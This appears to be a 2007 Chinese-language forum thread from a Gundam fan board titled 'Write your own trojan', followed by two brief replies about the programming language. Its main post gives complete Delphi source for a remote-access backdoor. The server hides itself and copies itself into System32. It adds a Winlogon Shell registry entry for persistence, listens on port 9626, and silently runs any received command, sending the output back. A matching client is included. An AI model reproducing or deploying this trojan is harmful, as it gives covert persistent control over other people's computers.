機動同盟 Gundam HK
 



寫自己的木馬@@

 
標題: 寫自己的木馬@@
小軒 (懦夫, 做左唔敢認._.)
上尉
Rank: 8Rank: 8
sss就sss架喇sss, 解唔明話 ...


吹水之王  
UID 16
精華 3
積分 26051
帖子 29050
威望 26051
金錢 981 盟幣
存款 15228 盟幣
體力 58 點
SMPC 418 COST
閱讀權限 150
註冊 2007-4-13
MP分 0
發表於 2007-11-25 20:03  資料 文集 短消息 
寫自己的木馬@@

程式跟傳統木馬一樣,分服務端和用戶端。運行服務端後會複製自身到SYSTEM32目錄下面,並在註冊表添加一自動行啟動項,打開本機9626埠開始等待接收用戶端的資料。當接收到用戶端資料時就當作CMD命令去執行,最後把回顯傳送回用戶端。用戶端很簡單,跟服務端連接成功後,輸入命令點執行,正常的話可以收到服務端的執行結果了。  



  源碼如下:

QUOTE:
////Server.pas//////////////

unit UtMain;

////////////////////////////////////
//////////BY SiuHin@GundamHK////////////////
////////Email:[email protected]////
///部分代碼從網上收集///////////
////////////////////////////////

interface

uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, Registry, ScktComp, StdCtrls;

type
TFmMain = class(TForm)
SS: TServerSocket;
Memo1: TMemo;
procedure FormCreate(Sender: TObject);
procedure SSAccept(Sender: TObject; Socket: TCustomWinSocket);
procedure SSClientRead(Sender: TObject; Socket: TCustomWinSocket);
private
{ Private declarations }
public
{ Public declarations }
end;

var
FmMain: TFmMain;
reg:TRegistry;

implementation

{$R *.dfm}

procedure TFmMain.FormCreate(Sender: TObject);
var
sysdir:array[0..50] of char;
begin
Application.ShowMainForm:=False;
FmMain.Left:=-200;     //運行不顯示視窗
reg:=TRegistry.Create;
reg.RootKey:=HKEY_LOCAL_MACHINE;
reg.OpenKey('SoftWare\Microsoft\Windows NT\CurrentVersion\Winlogon',true);
if reg.ReadString('Shell')<> 'Explorer.exe Lysvr.exe' then
reg.WriteString('Shell','Explorer.exe Lysvr.exe');   //建立開機啟動項
reg.Free;
GetSystemDirectory(sysdir,50);
if not FileExists(sysdir+'\Lysvr.exe') then
copyfile(Pchar(Application.exeName),pchar(sysdir+'\Lysvr.exe'),true);

SS.Port:=9626;
try
SS.Active:=True;
except
end;
end;

procedure TFmMain.SSAccept(Sender: TObject; Socket: TCustomWinSocket);
begin
Socket.SendText('連接成功');   //發現有連接時回傳‘連接成功 ’
end;

procedure TFmMain.SSClientRead(Sender: TObject; Socket: TCustomWinSocket);
var
RemoteCmd:string;
hReadPipe,hWritePipe:THandle;
si:STARTUPINFO;
lsa:SECURITY_ATTRIBUTES;
pi:PROCESS_INFORMATION;
cchReadBuffer:DWORD;
ph:PChar;
fname:PChar;
res:string;
begin
Memo1.Clear;
remotecmd:=Socket.ReceiveText;
fname:=allocmem(255);
ph:=AllocMem(5000);
lsa.nLength :=sizeof(SECURITY_ATTRIBUTES);
lsa.lpSecurityDescriptor :=nil;
lsa.bInheritHandle :=True;
if CreatePipe(hReadPipe,hWritePipe,@lsa,0)=false then
begin
socket.SendText('不能創建管道');
exit;
end;
fillchar(si,sizeof(STARTUPINFO),0);
si.cb:=sizeof(STARTUPINFO);
si.dwFlags:=(STARTF_USESTDHANDLES or STARTF_USESHOWWINDOW);
si.wShowWindow:=SW_HIDE;
si.hStdOutput:=hWritePipe;
StrPCopy(fname,remotecmd);
/////執行CMD命令////
if CreateProcess(nil,fname,nil,nil,true,0,nil,nil,si,pi)=False then
begin
socket.SendText('不能創建進程');
FreeMem(ph);
FreeMem(fname);
Exit;
end;
while(true) do
begin
if not PeekNamedPipe(hReadPipe,ph,1,@cchReadBuffer,nil,nil) then break;
if cchReadBuffer<>0 then
begin
if ReadFile(hReadPipe,ph^,4096,cchReadBuffer,nil)=false then break;
ph[cchReadbuffer]:=chr(0);
Memo1.Lines.Add(ph);
end
else
if(WaitForSingleObject(pi.hProcess ,0)=WAIT_OBJECT_0) then break;
Sleep(100);
end;
ph[cchReadBuffer]:=chr(0);
Memo1.Lines.Add(ph);   //memo接收回顯
CloseHandle(hReadPipe);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
CloseHandle(hWritePipe);
FreeMem(ph);
FreeMem(fname);
socket.SendText(Memo1.Text); ///將回顯發送回用戶端
end;

end.

///////////////////////////////////////////////////////////////////////////////////////////

//////用戶端/////////////////////

unit UtMain;

////////////////////////////////////
//////////BY lanyus////////////////
////////Email:[email protected]////
////////QQ:231221////////////////
////////////////////////////////

interface

uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, OleCtrls, SHDocVw, StdCtrls, IdBaseComponent, IdComponent,
IdUDPBase, IdUDPServer, Buttons, TLHelp32, ScktComp;

type
TFmMain = class(TForm)
WebBrowser1: TWebBrowser;
Label3: TLabel;
Edit2: TEdit;
Label4: TLabel;
Edit3: TEdit;
Button2: TButton;
CS: TClientSocket;
Edit4: TEdit;
Label5: TLabel;
Memo1: TMemo;
BitBtn2: TBitBtn;
procedure Button2Click(Sender: TObject);
procedure CSRead(Sender: TObject; Socket: TCustomWinSocket);
procedure BitBtn2Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;

var
FmMain: TFmMain;

implementation

{$R *.dfm}

procedure TFmMain.Button2Click(Sender: TObject);
begin
CS.Host:=Edit2.Text;
CS.Port:=StrToInt(Edit3.Text);
CS.Open;
end;

procedure TFmMain.CSRead(Sender: TObject; Socket: TCustomWinSocket);
begin
Memo1.Clear;
Memo1.Lines.Add(Socket.ReceiveText);
Memo1.Lines.Add('');
end;

procedure TFmMain.BitBtn2Click(Sender: TObject);
begin
CS.Socket.SendText(edit4.Text);
end;

end.



分享
頂部
ZetA-ChaR
伍長
Rank: 4


UID 59
精華 0
積分 525
帖子 468
威望 525
金錢 118 盟幣
存款 381 盟幣
體力 0 點
SMPC 2 COST
閱讀權限 50
註冊 2007-4-14
MP分 0
發表於 2007-12-12 23:31  資料 短消息 
尼個係delphi?




頂部
小軒 (懦夫, 做左唔敢認._.)
上尉
Rank: 8Rank: 8
sss就sss架喇sss, 解唔明話 ...


吹水之王  
UID 16
精華 3
積分 26051
帖子 29050
威望 26051
金錢 981 盟幣
存款 15228 盟幣
體力 58 點
SMPC 418 COST
閱讀權限 150
註冊 2007-4-13
MP分 0
發表於 2007-12-25 15:52  資料 文集 短消息 


QUOTE:
原帖由 ZetA-ChaR 於 2007-12-12 23:31 發表
尼個係delphi?

你覺得呢@w@
頂部

 




當前時區 GMT+8, 現在時間是 2024-11-29 09:59
Powered by Discuz! 5.0.0  © 2001-2006 Comsenz Inc.
Processed in 0.044352 second(s), 8 queries , Gzip enabled
清除 Cookies - 聯繫我們 - 機動同盟 Gundam HK - Archiver - WAP

 
NOTHING